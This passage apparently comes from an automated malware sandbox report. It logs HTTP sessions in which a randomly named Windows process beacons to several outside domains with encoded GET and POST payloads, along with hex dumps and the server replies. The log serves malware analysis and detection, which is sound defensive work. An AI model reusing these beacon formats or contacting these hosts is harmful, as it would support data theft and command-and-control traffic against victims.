Nov 25, 2024 13:57:28.799443007 CET	1236	IN	Data Raw: c5 01 9d 71 9e cf 13 68 8a 56 88 2b 6d a2 76 20 3b d4 61 3e 12 95 16 1f 47 c1 73 f2 d5 2f 2e 8a da 5f 29 8f 64 32 18 90 77 92 11 99 3a 19 e0 3b cb 5a 3f 55 4e 9b 74 6e a7 88 06 56 ae 90 36 1c 71 ba 0b ec f0 02 f6 48 b2 ce ec 50 de 18 16 17 77 e6 Data Ascii: qhV+mv ;a>Gs/._)d2w:;Z?UNtnV6qHPwh"0Ky{h%,cvj1fcbp,LykhMw!!Z9mwo148\@,\B7>}.Az^Y.?>SM#!G;p\z-{"S"A
Nov 25, 2024 13:57:28.799458981 CET	1236	IN	Data Raw: 00 c5 ae 08 9a 21 8a b0 3a 65 c8 42 74 fd 34 23 ab 89 e9 71 27 82 e6 9b 2a e4 2b 45 96 2e 4e 30 84 04 a2 bc b7 81 89 4c 08 90 09 6f d7 dc 1f c5 31 53 f3 ba 45 00 ef 5a 1c f3 e7 38 f2 78 3d 5a a9 4b 92 2e 17 80 bc 00 03 78 73 43 9d 8a 2c de 92 a8 Data Ascii: !:eBt4#q'+E.N0Lo1SEZ8x=ZK.xsC,,8az%Vl#y#ZZ[H\fe(gzTYQ?Di6z3NXTt%7[^@)DsSE3JZ{re4dJ](2{<Rv!qa'XWW
Nov 25, 2024 13:57:28.921132088 CET	1236	IN	Data Raw: b2 2d 37 a8 cf 3d 56 f3 c7 01 c0 78 21 14 69 7b 4d 58 75 1e 84 c0 f5 34 88 c2 ba b1 27 86 af c5 7d 87 d9 8b c7 80 04 14 ea cc 7a 08 df 82 1c 3a 18 f0 d0 f3 67 49 9b f1 da f7 58 5c fa 60 69 a4 e4 4e 07 85 c6 d4 87 bc b9 ba 6d 7c b2 a2 c1 20 23 12 Data Ascii: -7=Vx!i{MXu4'}z:gIX\`iNm\| #$oD},:q&qtI}#oz12f0xE/H[7\axA9vX2[G;m.@$N4vX0<!P:8?_I-tekveKy'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50033	217.160.0.158	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:30.083641052 CET	527	OUT	GET /bruv/?0dfXG=m8AssDc9uWk0x9GHCTrZnR9Y2jIcSn1GjYx2w9avnpMe4W6VVreO1nGOBjertTgGFNtTfqQ2X/AnqGB7Ol5o31E7begEaRgXS9U7KwBR2U2mwEb1+OLmP0VxkBeeDW6FuSeEkXI=&U0W=7ROlj HTTP/1.1 Host: www.accupower.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:57:31.418322086 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Content-Length: 33643 Connection: close Date: Mon, 25 Nov 2024 12:57:31 GMT Server: Apache Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 61 63 63 75 70 6f 77 65 72 2e 74 65 63 68 20 2d 20 6c 65 69 73 74 75 6e 67 73 66 26 23 32 32 38 3b 68 69 67 65 20 42 61 74 74 65 72 69 65 73 79 73 74 65 6d 65 20 2d 20 69 6e 66 6f 40 61 63 63 75 70 6f 77 65 72 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 32 30 31 32 2d 30 32 2d 30 37 54 31 32 3a 33 37 20 55 54 43 20 2d 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c [TRUNCATED] Data Ascii: <html> <head> <title>accupower.tech - leistungsfähige Batteriesysteme - info@accupower.tech</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <style> /! normalize.css 2012-02-07T12:37 UTC - http://github.com/necolas/normalize.css /article,aside,details,figcaption,figure,footer,header,hgroup,nav,section,summary{display:block}audio,canvas,video{display:inline-block;display:inline;zoom:1}audio:not([controls]){display:none}[hidden]{display:none}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}html,button,input,select,textarea{font-family:sans-serif}body{margin:0}a:focus{outline:thin dotted}a:hover,a:active{outline:0}h1{font-size:2em;margin:.67em 0}h2{font-size:1.5em;margin:.83em 0}h3{font-size:1.17em;margin:1em 0}h4{font-size:1em;margin:1.33em 0}h5{font-size:.83em;margin:1.67em 0}h6{font-size:.75em;margin:2.33em 0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}blockquote{margin:1em 40 [TRUNCATED]
Nov 25, 2024 13:57:31.418467999 CET	1236	IN	Data Raw: 6b 62 64 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 73 65 72 69 66 3b 5f 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 63 6f 75 72 69 65 72 20 6e 65 77 27 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a Data Ascii: kbd,samp{font-family:monospace,serif;_font-family:'courier new',monospace;font-size:1em}pre{white-space:pre;white-space:pre-wrap;word-wrap:break-word}q{quotes:none}q:before,q:after{content:'';content:none}small{font-size:75%}sub,sup{font-size:
Nov 25, 2024 13:57:31.418481112 CET	1236	IN	Data Raw: 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a Data Ascii: :content-box}input[type="search"]::-webkit-search-decoration,input[type="search"]::-webkit-search-cancel-button{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}textarea{overflow:auto;vertical-align:t
Nov 25, 2024 13:57:31.418493032 CET	1236	IN	Data Raw: 20 20 20 20 20 35 70 78 20 35 70 78 20 31 30 70 78 20 30 70 78 20 72 67 62 61 28 35 30 2c 20 35 30 2c 20 35 30 2c 20 30 2e 32 35 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 Data Ascii: 5px 5px 10px 0px rgba(50, 50, 50, 0.25); } h1 { margin:0; padding:0; line-height: 52px; margin-bottom:5px!important; size:60px;
Nov 25, 2024 13:57:31.418503046 CET	1236	IN	Data Raw: 75 45 4f 63 71 41 41 42 34 6d 62 49 38 75 53 51 35 52 59 46 62 43 43 31 78 42 31 64 58 4c 68 34 6f 7a 6b 6b 58 4b 78 51 32 59 51 4a 68 6d 6b 41 75 77 6e 6d 5a 47 54 4b 42 4e 41 2f 67 38 38 77 41 41 4b 43 52 46 52 48 67 67 2f 50 39 65 4d 34 4f 72 Data Ascii: uEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhG
Nov 25, 2024 13:57:31.418514013 CET	1236	IN	Data Raw: 72 71 70 61 58 6c 6c 69 72 53 4b 74 52 71 30 66 72 76 54 61 75 37 61 65 64 70 72 31 46 75 31 6e 37 67 51 35 42 78 30 6f 6e 58 43 64 48 5a 34 2f 4f 42 5a 33 6e 55 39 6c 54 33 61 63 4b 70 78 5a 4e 50 54 72 31 72 69 36 71 61 36 55 62 6f 62 74 45 64 Data Ascii: rqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1z
Nov 25, 2024 13:57:31.418525934 CET	1236	IN	Data Raw: 57 74 4f 33 31 39 6b 58 62 4c 35 66 4e 4b 4e 75 37 67 37 5a 44 75 61 4f 2f 50 4c 69 38 5a 61 66 4a 7a 73 30 37 50 31 53 6b 56 50 52 55 2b 6c 51 32 37 74 4c 64 74 57 48 58 2b 47 37 52 37 68 74 37 76 50 59 30 37 4e 58 62 57 37 7a 33 2f 54 37 4a 76 Data Ascii: WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9
Nov 25, 2024 13:57:31.418637037 CET	1236	IN	Data Raw: 38 2f 62 37 64 36 2b 4a 47 64 78 31 70 65 2b 6e 58 42 30 71 45 53 4e 39 53 68 55 77 66 6c 61 4d 38 34 59 62 6a 61 39 48 34 36 42 57 74 52 65 57 6f 65 38 34 6e 38 4c 67 75 6c 52 63 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 8/b7d6+JGdx1pe+nXB0qESN9ShUwflaM84Ybja9H46BWtReWoe84n8LgulRcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPiP+BkAjHpC5E5hSIwAAAAASUVORK5CYII=')} body.layout-2::before {background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEU
Nov 25, 2024 13:57:31.418648005 CET	1236	IN	Data Raw: 4e 30 55 6d 56 6d 4f 6d 52 76 59 33 56 74 5a 57 35 30 53 55 51 39 49 6e 68 74 63 43 35 6b 61 57 51 36 52 6a 4d 7a 4e 6a 42 42 4e 55 59 30 4e 44 41 35 4d 54 46 46 4e 45 45 7a 52 6a 55 35 4f 54 41 33 4f 45 4d 32 51 55 55 77 4f 45 51 69 4c 7a 34 67 Data Ascii: N0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6RjMzNjBBNUY0NDA5MTFFNEEzRjU5OTA3OEM2QUUwOEQiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz6pV9DfAAAHQklEQVR42qxV0ZXDIAyTMs7N1Yk6cFQwBhyOBtq7Dx7UyEKWIcXP43mIOgAcEA6mWVBZM
Nov 25, 2024 13:57:31.418659925 CET	556	IN	Data Raw: 62 4a 4c 46 44 53 4f 36 36 76 33 52 36 75 33 6d 43 59 66 33 69 47 6d 50 30 4b 72 69 6b 79 31 61 4a 71 74 70 48 70 2b 61 37 2f 71 57 67 64 61 6e 66 56 67 38 70 49 38 77 72 4d 64 61 49 62 67 59 6c 51 41 31 48 76 4d 78 31 66 6e 45 4f 6c 68 72 74 4d Data Ascii: bJLFDSO66v3R6u3mCYf3iGmP0Kriky1aJqtpHp+a7/qWgdanfVg8pI8wrMdaIbgYlQA1HvMx1fnEOlhrtMl61Ho/0i6ya15J3MqJiPlP4KnEeHNalmCydcMl1r1L9JVmK9ltCY9Xb80sh7THO+xfXdvHKUQ4aeW/B0JT+rcvib8z7JELd6FHwIFXt2dY643pv5nWWgtNAkWvXBR7O+3AveH49ncpY7B9+xkaNHxqCytp/WsHTd+
Nov 25, 2024 13:57:31.539411068 CET	1236	IN	Data Raw: 54 7a 47 50 47 6c 63 78 62 67 62 65 4c 30 50 44 76 2b 78 64 43 2f 45 65 41 36 79 4f 49 59 31 69 4d 51 44 35 61 37 38 4d 70 6f 52 6f 38 72 71 42 33 45 65 55 72 4d 32 56 74 79 54 50 37 38 38 43 79 4b 6f 47 61 54 49 6e 38 42 64 30 4e 50 79 6f 63 6e Data Ascii: TzGPGlcxbgbeL0PDv+xdC/EeA6yOIY1iMQD5a78MpoRo8rqB3EeUrM2VtyTP788CyKoGaTIn8Bd0NPyocnRhxCv8+Or7l45U3e/JwtgZ7c6LnFMe5iicn1wuL56H+wZXDY72RgSpF+WsbVvDzHL+8h69siw1DsHut9qoxSGWJ2P8DcIRcrG2PDvAjiS1nxytnC3Ak9TzzvhAxyYYk+ZyI75bmXQrBmIeBuvLDVebfOO4Adt4tiT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	50034	213.249.67.10	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:37.663445950 CET	804	OUT	POST /x6qo/ HTTP/1.1 Host: www.tanjavanlaar.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.tanjavanlaar.online Referer: http://www.tanjavanlaar.online/x6qo/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 47 61 41 34 70 66 4a 71 62 67 62 74 30 46 66 41 2b 32 4f 6b 52 69 71 74 49 4c 48 53 6f 2f 50 66 43 7a 51 37 39 30 65 38 67 6d 61 35 6c 58 6b 33 51 6c 34 36 6a 54 73 32 44 44 73 2f 6e 51 43 44 4d 57 6c 4f 51 46 37 52 54 4a 31 34 63 48 4a 41 54 56 75 31 33 48 31 61 32 47 6b 4d 7a 71 66 32 2b 30 7a 68 62 49 52 68 73 36 35 6e 44 67 2b 58 69 6e 79 38 52 78 68 2f 65 44 4a 77 68 62 56 35 2f 6e 4b 6a 67 6b 4a 4f 50 47 4f 52 6c 56 70 34 41 6c 37 54 34 68 61 70 5a 4c 44 35 4f 37 59 76 65 38 6d 68 52 61 2b 53 43 6a 30 56 67 4e 37 65 2f 4a 5a 4d 69 6e 50 46 73 76 47 4e 42 68 48 54 74 69 70 53 55 67 55 38 67 4b 71 59 Data Ascii: 0dfXG=GaA4pfJqbgbt0FfA+2OkRiqtILHSo/PfCzQ790e8gma5lXk3Ql46jTs2DDs/nQCDMWlOQF7RTJ14cHJATVu13H1a2GkMzqf2+0zhbIRhs65nDg+Xiny8Rxh/eDJwhbV5/nKjgkJOPGORlVp4Al7T4hapZLD5O7Yve8mhRa+SCj0VgN7e/JZMinPFsvGNBhHTtipSUgU8gKqY
Nov 25, 2024 13:57:38.935560942 CET	271	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:57:38 GMT Server: Apache/2.4.56 (Debian) Content-Length: 97 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50035	213.249.67.10	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:40.378528118 CET	828	OUT	POST /x6qo/ HTTP/1.1 Host: www.tanjavanlaar.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.tanjavanlaar.online Referer: http://www.tanjavanlaar.online/x6qo/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 47 61 41 34 70 66 4a 71 62 67 62 74 30 6c 76 41 79 78 61 6b 55 43 71 75 48 72 48 53 69 66 50 62 43 7a 63 37 39 31 62 33 68 56 2b 35 6b 31 38 33 58 67 55 36 76 7a 73 32 4e 6a 73 36 70 77 43 59 4d 57 35 38 51 48 66 52 54 4a 78 34 63 47 35 41 53 69 36 79 32 58 31 55 37 6d 6b 30 2b 4b 66 32 2b 30 7a 68 62 49 46 62 73 36 78 6e 44 51 75 58 67 47 79 2f 53 78 68 77 4a 7a 4a 77 6c 62 56 39 2f 6e 4b 42 67 6c 6c 6f 50 45 47 52 6c 55 5a 34 48 33 44 55 7a 68 62 69 48 37 43 73 47 71 30 2f 5a 65 54 2f 56 62 75 71 65 6a 35 33 6f 62 36 45 6a 36 5a 76 77 33 76 48 73 74 65 2f 42 42 48 35 76 69 52 53 47 33 59 62 76 2b 50 37 47 5a 59 61 48 39 30 73 34 67 63 75 31 55 73 65 34 46 49 56 46 77 3d 3d Data Ascii: 0dfXG=GaA4pfJqbgbt0lvAyxakUCquHrHSifPbCzc791b3hV+5k183XgU6vzs2Njs6pwCYMW58QHfRTJx4cG5ASi6y2X1U7mk0+Kf2+0zhbIFbs6xnDQuXgGy/SxhwJzJwlbV9/nKBglloPEGRlUZ4H3DUzhbiH7CsGq0/ZeT/Vbuqej53ob6Ej6Zvw3vHste/BBH5viRSG3Ybv+P7GZYaH90s4gcu1Use4FIVFw==
Nov 25, 2024 13:57:41.718849897 CET	271	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:57:41 GMT Server: Apache/2.4.56 (Debian) Content-Length: 97 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50036	213.249.67.10	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:43.291762114 CET	1841	OUT	POST /x6qo/ HTTP/1.1 Host: www.tanjavanlaar.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.tanjavanlaar.online Referer: http://www.tanjavanlaar.online/x6qo/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 47 61 41 34 70 66 4a 71 62 67 62 74 30 6c 76 41 79 78 61 6b 55 43 71 75 48 72 48 53 69 66 50 62 43 7a 63 37 39 31 62 33 68 56 32 35 6b 41 67 33 58 48 41 36 68 54 73 32 53 54 73 37 70 77 44 43 4d 57 68 43 51 48 6a 76 54 4c 35 34 64 67 4e 41 62 7a 36 79 2f 58 31 55 79 47 6b 50 7a 71 66 6e 2b 30 6a 6c 62 49 56 62 73 36 78 6e 44 57 4b 58 6b 58 79 2f 65 52 68 2f 65 44 4a 33 68 62 56 46 2f 6d 75 37 67 6c 68 65 50 31 6d 52 6c 30 4a 34 42 45 37 55 73 52 62 67 47 37 44 76 47 71 35 34 5a 61 7a 4e 56 62 61 41 65 6b 78 33 69 64 61 5a 78 75 4e 6a 6d 42 2f 54 31 71 71 4a 45 6c 4c 50 32 53 46 65 49 48 73 30 77 4e 33 49 46 76 4d 67 4f 66 39 56 2f 41 6b 44 33 53 56 78 79 46 70 4a 61 71 74 47 56 32 32 4f 74 52 5a 46 70 4b 44 56 79 70 4b 68 45 5a 6f 68 6b 38 51 47 6b 34 50 4a 51 30 4f 75 4c 75 4e 77 2f 71 78 4c 33 32 31 69 52 6c 6f 52 4a 67 37 75 53 47 32 52 35 34 36 56 50 58 55 36 61 50 4d 74 36 55 77 63 76 68 68 50 68 70 59 4a 50 53 2b 4f 4b 37 6b 42 62 39 4f 77 45 36 77 5a 70 6c 54 43 53 56 32 4c [TRUNCATED] Data Ascii: 0dfXG=GaA4pfJqbgbt0lvAyxakUCquHrHSifPbCzc791b3hV25kAg3XHA6hTs2STs7pwDCMWhCQHjvTL54dgNAbz6y/X1UyGkPzqfn+0jlbIVbs6xnDWKXkXy/eRh/eDJ3hbVF/mu7glheP1mRl0J4BE7UsRbgG7DvGq54ZazNVbaAekx3idaZxuNjmB/T1qqJElLP2SFeIHs0wN3IFvMgOf9V/AkD3SVxyFpJaqtGV22OtRZFpKDVypKhEZohk8QGk4PJQ0OuLuNw/qxL321iRloRJg7uSG2R546VPXU6aPMt6UwcvhhPhpYJPS+OK7kBb9OwE6wZplTCSV2LEhyyOscq961ldPbogKsLK7RhgCFHV1+fIfysWeHM7ej9f93JsABen14MjcxcnbG5/UD5+gDDG2sTN3og6GDFRDluBkaO5zIKaEmivfMzx7Vb384N9X22QDXMTATkekIE8FE0an7/yCojPK9otNlcHnlKANGPFOEN1PihmVasQ625OFLdNE3nRXsCZFXCW6aUwzpVPCsqYsfMNtmzVnsW4CBRMrpC0kxhYgxc4O71ZIIBv73/4QYJVlKMby4VuccThEj4QGFnDOJndx+j47h6LGSM1lnk8ItzSqAkGgmWGQ2jTE2LPHLnZ/zWpieZxp3rlvZFYG0nkiEdMqA3McYZrH4LueGUXaa5V4uIoCqOrnMC0EjINhZo/xRfUtnFDed4ZhLXHo/06L7vHQUXCoIhTBXnGlEPy6256Bstu5AXlj81IqvCM+WokPqGer5Nuspz6fscviJYJQCzOu/kXCPw6PgMjb9K+JJKywwIWxRqb42soNfRtoMD2wdH6qCoJMZwrb3o03CoGxvQ0z3u32m2x76A4z+t7ai/6ef+8y3UtUtcseW/EJAuNbSKukaqpQxgzj3G+TrGBxZOxsnis1JN0oTyEi051R0BtnKXEPbFSXTVjiHKL214ZWvcjPXlR6FwNws33qp7mfbVhbIh4793X1aot8kgKG8EGV [TRUNCATED]
Nov 25, 2024 13:57:44.490747929 CET	271	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:57:44 GMT Server: Apache/2.4.56 (Debian) Content-Length: 97 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50037	213.249.67.10	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:45.999303102 CET	532	OUT	GET /x6qo/?0dfXG=LYoYqqsXSyXZ912d02KeRxWxUajovPP+KCE++TS9h3rijU4gS1lBkAl2SxoHngebSXZzdlj5br48AWpKGxuZwHFzrTAaxdvQ/X7He5kEj4NwOXn+jWKWbQEmUjM4tYdd4DTDmwg=&U0W=7ROlj HTTP/1.1 Host: www.tanjavanlaar.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:57:47.239139080 CET	271	IN	HTTP/1.1 404 Not Found Date: Mon, 25 Nov 2024 12:57:47 GMT Server: Apache/2.4.56 (Debian) Content-Length: 97 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 2f 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="0;url=/" /></head><body></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50038	92.118.228.160	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:53.730799913 CET	795	OUT	POST /wlzg/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/wlzg/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 52 32 55 54 54 53 56 61 53 43 53 48 73 6e 54 57 4a 78 6f 44 4f 70 6b 66 43 48 38 38 6f 6c 4b 77 6b 69 58 78 66 4d 56 71 64 4f 67 64 57 69 4b 43 75 30 4f 69 53 72 6e 6b 5a 46 57 7a 55 68 4b 53 59 49 56 66 49 68 32 6b 45 4d 6a 54 4e 43 4e 61 44 33 46 43 54 59 4b 45 7a 4d 6f 47 73 45 64 44 32 5a 66 50 6e 2b 79 2b 4e 2f 39 67 6d 55 66 4c 74 65 4b 47 58 6a 51 57 41 59 77 6d 69 70 7a 50 38 45 57 31 6c 57 5a 59 58 49 6b 75 78 41 72 46 49 55 2f 42 47 69 67 44 71 76 4c 4c 45 4d 64 52 2f 46 69 2b 71 63 47 76 53 44 56 77 4f 54 43 44 39 79 6c 36 53 4f 79 34 64 48 4d 6c 68 47 4c 65 4c 41 47 72 36 79 74 58 51 4d 6c 4b Data Ascii: 